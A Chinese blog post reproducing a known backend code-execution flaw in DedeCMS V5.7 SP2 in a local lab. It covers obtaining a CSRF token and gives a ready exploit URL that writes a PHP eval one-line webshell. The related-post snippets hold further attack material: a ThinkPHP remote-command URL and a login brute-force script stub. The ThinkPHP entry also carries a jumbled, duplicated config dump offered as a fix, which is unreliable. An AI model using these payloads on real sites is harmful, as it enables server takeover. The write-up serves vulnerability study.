DedeCMS V5.7 SP2 后台代码执行漏洞-CNVD-2018-01221

最新推荐文章于 2024-08-03 16:43:27 发布
最新推荐文章于 2024-08-03 16:43:27 发布
阅读量1.3k 收藏 2
点赞数
分类专栏: CMS漏洞复现 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WFC1006848997/article/details/104194523
版权

织梦内容管理系统(DedeCms)是一款PHP开源网站管理系统。DeDeCMS V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。

首先我们先去官网下载DedeCMS V5.7 SP2

下载网址:http://www.dedecms.com/products/dedecms/downloads/

源代码版本:DeDeCMS V5.7 SP2(UTF-8)

然后把环境搭好,设置好各项参数。

漏洞复现

这个漏洞就比较鸡肋,因为需要搞到管理员的权限,也就是要能登录后台。

我们这里直接用刚刚设置好的管理员密码登录。

后台登录文件在 uploads/dede/login.php

在这里插入图片描述
我们登录到后台后,需要分析tpl.php 的代码,漏洞也是出现在这里。

tpl.php 文件在 uploads\dede\tpl.php

在这里插入图片描述
然后直接跳到第251行

第251行定义了一个savetagfile的函数,然后判断,参数”action”是否等于“savetagfile”,如果等于则执行该选择结构。

在这里插入图片描述
然后是第253行,这有一个CSRF校验函数,需要加上token来绕过限制。

在这里插入图片描述
接着是254行的正则表达式,这个正则是用来判断 filename 参数是否匹配正则表达式的条件,不匹配就不执行修改操作并退出。

在这里插入图片描述
最后是第264行,这里把 content 参数里面的内容写入到相对用的路径里,由于这一部分代码除了对写入的文件名字做了简单的过滤和一个csrf防护之外,其他并没有什么安全措施,导致我们可以任意写入代码。

在这里插入图片描述
通过第154行的代码,有csrf检测防御,需要获得token来进行绕过。再次浏览tpl.php代码,发现action的参数有很多,比如del,edit,upload等等,但只有传入upload的时候页面才会获取token,而其他的都没有获取token,所以只能通过action=upload来获取token。

在这里插入图片描述
所以我们用浏览器浏览

http://192.168.30.129/DedeCMS5.7/uploads/dede/tpl.php?action=upload

也就是uploads/dede/tpl.php?action=upload

我们就是需要先登录后台才能正常访问。

在这里插入图片描述
然后右键查看源代码我们就可以在第34行看到token的值了

在这里插入图片描述
由于dedecms全局变量注册的特性,所以这里的content变量和filename变量可控。

可以把content内容直接写到以.lib.php结尾的文件中。

我们就可以构造payload了

Payload: http://192.168.30.129/DedeCMS5.7/uploads/dede/tpl.php?action=savetagfile&token=e75ea37627a60b8a5d0511e2170a668b&filename=abc.lib.php&content=%3C?php%20@eval($_REQUEST[%22test%22]);?%3E

也就是上传一句话木马 <?php @eval($_REQUEST["test"]);?>

在这里插入图片描述
文件上传成功,文件在 dedecms/uploads/include/taglib/abc.lib.php

在这里插入图片描述在这里插入图片描述
再用菜刀连接,完成。

在这里插入图片描述
参考:https://www.cnblogs.com/yuzly/p/11326571.html

Spaceman-911
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
泛微OA漏洞学习——E-Cology BshServlet 远程代码执行漏洞 CNVD-2019-32204
记录并分享学习安全的知识点..
07-10 1668
2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁,泛微e-cology OA系统的J**A Beanshell接口可被未授权访问,攻击者调用该Beanshell接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行漏洞等级严重。......
Dedecms 后台自动识别验证码爆破脚本
weixin_39216626的博客
12-07 718
#!/usr/bin/env python # -*- coding:utf-8 -*- import requests import pytesseract from PIL import Image import re class DedeCMSLogin: def __init__(self, userid, pwd): self.vdcode = "" self.userid = userid self.pwd = pwd
DedeCMS V5.7 SP2存在代码执行漏洞分析(CNVD-2018-01221
wednesday的博客
07-15 572
该问题是一个由任意文件上传带来的代码执行漏洞,由于本身要求上传php结尾文件,再加上未对上传文件内容进行检查,所以导致了该漏洞漏洞产生在/dede/tpl.php,由此可见要利用该漏洞你得登录进后台。问题产生在代码251行开始。代码详解如下图 漏洞复现: 前提是你得通过其他方法进入到dede的后台,比如弱口令啥的。 然后由上述图片中csrf_check()函数会校验token,所以我们得先获取到token。 要怎么才能获取到token呢?我们再去tpl.php里看一下,发现ac
DeDeCMS漏洞
最新发布
weixin_53198216的博客
08-03 184
4.在生成下选择更新主页HTML,将主页位置后缀改为php,首页模式选择生成静态,再点击更新主页HTML。2.选择模板下的默认模板管理,找到index.htm。7.打开蚁剑,输入网址和密码点击测试连接,显示成功。6.复制到地址栏访问,没有显示内容证明注入成功。3.对这个文件进行编辑写入一句话木马并保存。5.出现一个更新后的路径。
php中%3c w() %3e,DedeCMS V5.7 SP2后台存在代码执行漏洞
weixin_36256978的博客
03-10 292
原标题:DedeCMS V5.7 SP2后台存在代码执行漏洞*本文原创作者:风炫520,本文属FreeBuf原创奖励计划,未经许可禁止转载简介织梦内容管理系统(DedeCms)是一款PHP开源网站管理系统。DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞,攻击者可利用该漏洞在增加新的标签中上传木马,获取webshell。笔者是2018年2月28日在官网下载的DedeCMS V5...
Dedecms代码执行(cnvd-2018-01221)
m0_65150886的博客
02-02 299
织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统。Dedecms V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。2.访问http://ip:port/dede/login.php,进入后台登录页面。1.访问http://ip:port,出现如下页面,开始实验。5.蚁剑连接,getshell。1.禁止此处写入文件。4.访问上传文件路径。
dedeCMS V5.7 SP2后台代码执行漏洞复现(CNVD-2018-01221)
W小哥
03-03 2039
一、漏洞描述 织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统。Dedecms V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。 二、利用条件 该漏洞利用需要登录后台,并且后台的账户权限是管理员权限。 三、漏洞环境搭建 1、官方下载DeDeCMS V5.7 SP2(UTF-8),下载地址: http://www.d...
向日葵RCE漏洞CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更...
solly0880#wiki#若依管理系统 后台任意文件读取 CNVD-2021-019311
07-25
若依(RuoYi)管理系统 后台任意文件读取漏洞描述若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件漏洞影响app=
spring framework远程代码执行漏洞复现(CNVD-2022-23942 CVE-2022-22965)
yang1234567898的博客
04-18 7064
3 月 30 日,国家信息安全漏洞共享平台(CNVD)接收到蚂蚁科技集团股份有限公司报送的 Spring 框架远程命令执行漏洞CNVD-2022-23942)。攻击者利用该漏洞,可在未授权的情况下远程执行命令。CNVD 对该漏洞的综合评级为“高危”。 漏洞影响: JDK9+ 使用了 Spring 框架或衍生框架 Apache Tomcat 作为 Servlet 容器 spring-webmvc 或 spring-webflux 依赖 Spring Framework 版本 5.3.0..
dedeCMS后台代码执行漏洞-CNVD-2018-01221
飞鱼的企鹅的博客
06-20 1988
复现的第一个漏洞CNVD-2018-01221DeDeCMS简介 织梦内容管理系统(DedeCms)是一款PHP开源网站管理系统。DeDeCMS V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。
[漏洞复现]dedeCMS V5.7 SP2后台代码执行(CNVD-2018-01221)
Vicl1fe的博客
02-19 702
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/yuzly/p/11326571.html 源码网址: http://www.dedecms.com/products/dedecms/downloads/ 漏洞概述 需要以管理员权限登录后台。在tpl.php中savefile行为没有进行严格的过滤 ...
结尾%3c php,DedeCMS V5.7 SP2 后台代码执行漏洞-CNVD-2018-01221
weixin_36078354的博客
03-24 189
织梦内容管理系统(DedeCms)是一款PHP开源网站管理系统。DeDeCMS V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。首先我们先去官网下载DedeCMS V5.7 SP2下载网址:http://www.dedecms.com/products/dedecms/downloads/源代码版本:DeDeCMS V5.7 S...
DedeCMS v5.7 SP2_任意修改前台用户密码漏洞分析
wednesday的博客
07-06 241
首先定位到member/resetpassword.php,代码开头未相关文件的包含操作,然后接受了一个叫dopost和id的变量。 接下来是if选择结构通过参数dopost的值来判断接下来将要进行的操作,如果dopost为空则跳转到resetpassword.html,如果$dopost=="getpwd"则进行验证验证码等等操作,如果$dopost=="safequestion"则可以跳过验证验证码等操作直接开始验证用户输入的问题和答案是否与数据库中查询的一致,问题便从这里开始。...
dedeCMS后台上传getshell漏洞CNVD-2018-01221)复现
weixin_44897902的博客
10-27 1660
漏洞名: CNVD-2018-01221 影响: Dedecms v5.7 sp2 危害: 任意代码执行,getshell; 准备工作: win7虚拟机+Dedecms v5.7 sp2+phpstudy 首先安装Dedecms v5.7 sp2: http://www.dedecms.com 下载安装之后直接访问localhost/Dedecms v5.7 sp2/uploads 会自动跳到...
CMS V5.7 SP2漏洞复现(CVE-2018-20129)
haoaaao的博客
04-04 4775
0x00 前置 1、CVE中对该漏洞的描述: 在 DedeCMS V5.7 SP2 中发现了一个问题。uploads/include/dialog/select_images_post.php 允许远程攻击者通过双扩展名和修改的“.php”子字符串以及 image/jpeg 内容类型上传和执行任意 PHP 代码,如 filename=1 所示。 jpg.p*hp 值。 2、所需工具 (1)cms网站源码版本:DedeCMS V5.7 SP2 下载链接...
dedecms 5.7 download.php 代码执行漏洞,Dedecms V5.7后台任意代码执行[CVE-2018-7700] [高危漏洞][官方未修复]...
weixin_36410316的博客
04-02 770
漏洞的前提是登陆了后台,所以要不要修复大家看着办吧!该漏洞的触发点为/dede/tag_test_action.php。起因是csrf_check()的绕过,导致可执行任意代码。查看/dede/tag_test_action.php文件的源码:如果直接访问这个文件,会进入csrf_check()函数。提示token错误,且退出执行。跟进csrf_check(),该函数所在文件为dede/conf...
Dedecms 中的预认证远程代码执行
xuu4561的博客
10-05 299
在这篇博文中,我将分享对 Dedecms(或翻译成英文的“Chasing a Dream”CMS)的技术评论,包括它的攻击面以及它与其他应用程序的不同之处。最后,我将结束一个影响v5.8.1 预发布的预认证远程代码执行漏洞。这是一款有趣的软件,因为它自最初发布以来已有 14 年的历史,而且 PHP 多年来发生了很大变化。 对于网上搜索“什么是中国最大的CMS”很快发现,多 源 的状态是DEDECMS是最流行的。然而,这些来源几乎都有一个共同点:它们都是旧的。 所以,我决定做一个粗略的搜索: 该产品部署非常
vulfocus thinkphp 代码执行 (CNVD-2018-24942)
03-29
漏洞描述: ThinkPHP是一款快速、简单的PHP开发框架,该框架在处理某些特定情况下的输入时存在代码执行漏洞。攻击者可以通过构造恶意的输入数据,利用该漏洞执行任意代码,从而控制服务器。 漏洞影响: ThinkPHP 5.0.x - 5.0.18 版本 ThinkPHP 5.1.x - 5.1.0-beta.5 版本 漏洞利用: 攻击者可以通过在URL中添加参数,或者在POST请求中添加参数,来触发该漏洞。下面是一个简单的例子: http://example.com/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 漏洞修复: 1.升级到最新版本的ThinkPHP 2.禁用动态调用方法 在config.php文件中添加以下配置: 'APP_DEBUG' => false, 'APP_USE_NAMESPACE' => true, 'DEFAULT_FILTER' => 'htmlspecialchars', 'DEFAULT_CONTROLLER' => 'index', 'URL_CASE_INSENSITIVE' => true, 'URL_MODEL' => '2', 'URL_PATHINFO_DEPR' => '/', 'URL_ROUTER_ON' => true, 'URL_ROUTE_RULES' => array( ), 'DEFAULT_MODULE' => 'index', 'URL_HTML_SUFFIX' => '.html', 'APP_AUTOLOAD_PATH' => '@.TagLib', 'APP_AUTOLOAD_LAYER' => 'Controller,Model', 'APP_AUTOLOAD_PATH' => '@.TagLib', 'APP_AUTOLOAD_LAYER' => 'Controller,Model', 'DEFAULT_FILTER' => 'htmlspecialchars', 'DEFAULT_TIMEZONE' => 'Asia/Shanghai', 'TMPL_ACTION_ERROR' => APP_PATH . 'Tpl/error.tpl', 'TMPL_ACTION_SUCCESS' => APP_PATH . 'Tpl/success.tpl', 'DEFAULT_AJAX_RETURN' => 'JSON', 'TOKEN_ON' => true, 'TOKEN_NAME' => '__hash__', 'TOKEN_TYPE' => 'md5', 'TOKEN_RESET' => true, 'VAR_FILTERS' => 'htmlspecialchars', 'SESSION_AUTO_START' => true, 'DEFAULT_LANG' => 'zh-cn', 'APP_GROUP_LIST' => 'Home,Admin', 'APP_GROUP_MODE' => 1, 'APP_GROUP_PATH' => 'Modules', 'AUTOLOAD_PATH' => 'Think.Util', 'APP_TAGS_ON' => true, 'APP_SUB_DOMAIN_DEPLOY' => false, 'APP_SUB_DOMAIN_RULES' => array(), 'OUTPUT_ENCODE' => false, 'COOKIE_EXPIRE' => 0, 'COOKIE_DOMAIN' => '', 'COOKIE_PATH' => '/', 'COOKIE_PREFIX' => '', 'URL_PARAMS_BIND' => true, 'URL_404_REDIRECT' => '', 'DB_TYPE' => 'mysql', 'DB_HOST' => '127.0.0.1', 'DB_NAME' => 'thinkphp', 'DB_USER' => 'root', 'DB_PWD' => '', 'DB_PORT' => '3306', 'DB_PREFIX' => 'tp_', 'DB_FIELDTYPE_CHECK' => false, 'DB_FIELDS_CACHE' => true, 'DB_CHARSET' => 'utf8', 'DB_DEBUG' => true, 'DB_LITE' => false, 'DB_DEPLOY_TYPE' => 0, 'DB_RW_SEPARATE' => false, 'DB_MASTER_NUM' => 1, 'DB_SLAVE_NO' => '', 'DB_SQL_BUILD_CACHE' => false, 'DB_SQL_BUILD_LENGTH' => 20, 'TIME_ZONE' => 'PRC', 'SHOW_PAGE_TRACE' => false, 'LOG_RECORD' => true, 'LOG_TYPE' => 'File', 'LOG_LEVEL' => 'EMERG,ALERT,CRIT,ERR', 'LOG_FILE_SIZE' => 2097152, 'LOG_EXCEPTION_RECORD' => false, 'LOG_AUTO_RECORD' => true, 'SESSION_OPTIONS' => array(), 'SESSION_TYPE' => '', 'SESSION_PREFIX' => 'think', 'SESSION_EXPIRE' => 3600, 'SESSION_TABLE' => '', 'SESSION_COOKIE_NAME' => '', 'SESSION_AUTO_START' => true, 'SESSION_GC_DIVISOR' => 10000, 'SESSION_GC_MAXLIFETIME' => 1440, 'SESSION_DOMAIN' => '', 'SESSION_PATH' => '/', 'SESSION_SECURE' => false, 'SESSION_HTTPONLY' => true, 'VAR_SESSION_ID' => 'session_id', 'CACHE_TYPE' => 'File', 'CACHE_EXPIRE' => 0, 'CACHE_PREFIX' => '', 'CACHE_PATH' => TEMP_PATH, 'CACHE_FILE_SUFFIX' => '.php', 'CACHE_SERIALIZE' => true, 'CACHE_CHECK' => false, 'TMPL_CACHE_ON' => true, 'TMPL_CACHE_PREFIX' => '', 'TMPL_CACHE_TIME' => 0, 'TMPL_CACHE_PATH' => CACHE_PATH, 'TMPL_CACHE_FILE_SUFFIX' => '.php', 'TMPL_CACHE_FILE_EXT' => '.php', 'TMPL_CACHE_CHECK' => true, 'TMPL_EXCEPTION_FILE' => THINK_PATH . 'Tpl/think_exception.tpl', 'TMPL_ACTION_ERROR' => APP_PATH . 'Tpl/error.tpl', 'TMPL_ACTION_SUCCESS' => APP_PATH . 'Tpl/success.tpl', 'TMPL_DETECT_THEME' => false, 'TMPL_TEMPLATE_SUFFIX' => '.html', 'TMPL_ENGINE_TYPE' => 'Think', 'TMPL_CACHFILE_SUFFIX' => '.php', 'TMPL_DENY_FUNC_LIST' => 'echo,exit', 'TMPL_DENY_PHP' => false, 'TMPL_L_DELIM' => '{', 'TMPL_R_DELIM' => '}', 'TMPL_VAR_IDENTIFY' => 'array', 'TMPL_STRIP_SPACE' => true, 'TMPL_CACHE_ON' => false, 'TMPL_LAYOUT_ITEM' => '{__CONTENT__}', 'TMPL_CONTENT_TYPE' => 'text/html', 'TMPL_ACTION_ERROR' => APP_PATH . 'Tpl/error.tpl', 'TMPL_ACTION_SUCCESS' => APP_PATH . 'Tpl/success.tpl', 'LANG_SWITCH_ON' => false, 'LANG_AUTO_DETECT' => true, 'LANG_LIST' => 'zh-cn', 'VAR_LANGUAGE' => 'l', 'LANG_AUTO_REDIRECT' => false, 'TEMPLATE_CHARSET' => 'utf-8', 'COOKIE_HTTPONLY' => '', 'SECURE_FILTER' => '', 'CRYPT_TYPE' => 'Think', 'AUTH_KEY' => 'AuthKey', 'SECURITY_KEY' => 'SecurityKey', 'TOKEN_ON' => false, 'TOKEN_NAME' => '__hash__', 'TOKEN_TYPE' => 'md5', 'TOKEN_RESET' => true, 'TOKEN_CRYPT' => false, 'VAR_FILTERS' => '', 'DEFAULT_MODULE' => 'Home', 'DEFAULT_ACTION' => 'index', 'DEFAULT_THEME' => '', 'THEME_LIST' => '', 'THEME_DEFAULT' => '', 'THEME_ON' => false, 'THEME_FILE_SUFFIX' => '.html', 'THEME_TEMPLATE_SUFFIX' => '.html', 'THEME_TEMPLATE_PREFIX' => '', 'THEME_TEMPLATE_SUFFIX' => '.html', 'THEME_TEMPLATE_SEPARATOR' => '_',
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值